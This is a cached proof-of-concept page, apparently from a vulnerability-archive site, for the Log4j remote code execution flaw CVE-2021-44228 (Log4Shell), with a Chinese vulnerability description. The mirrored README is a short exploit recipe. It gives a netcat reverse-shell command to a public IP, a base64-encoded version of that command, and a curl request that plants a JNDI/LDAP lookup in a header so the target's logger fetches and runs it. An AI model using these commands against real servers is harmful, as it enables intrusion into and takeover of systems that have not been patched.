Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2021-44228 PoC — Apache Log4j 代码问题漏洞

Source
Associated Vulnerability
Title:Apache Log4j 代码问题漏洞 (CVE-2021-44228)
Description:Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞,攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器,当该请求被打印成日志时就会触发远程代码执行。
Description
Log4jshell - CVE-2021-44228
Readme
# log4jshell_CVE-2021-44228
Log4jshell - CVE-2021-44228

#### Netcat
nc [Public IP] [Port] -e /bin/sh

#### Convert into Base64
bmMgMy4xMD.....wMyA4ODg4IC1lIC9iaW4vc2g=

#### Payload
curl [Target Website] -H "X-Forwarded-Host: ${jndi:ldap://[ReverseshellIP]:[Port]/Basic/Command/Base64/[Payload in base64]

#### Proof of concept

[Log4j PoC](https://youtu.be/3AxSFqX4WCs)

### Follow 

#### [Youtube](https://www.youtube.com/c/vulnmachines)
#### [Twitter](https://www.twiiter.com/vulnmachines)
#### [Telegram](https://t.me/vulnmachines)
#### [Vulnmachines.com](https://www.vulnmachines.com)
#### [LinkedIn](https://www.linkedin.com/company/vulnmachines/)

File Snapshot

[4.0K] /data/pocs/278c2efa989d37ff3c4532f80b40fe38d1d2f101 └── [ 656] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.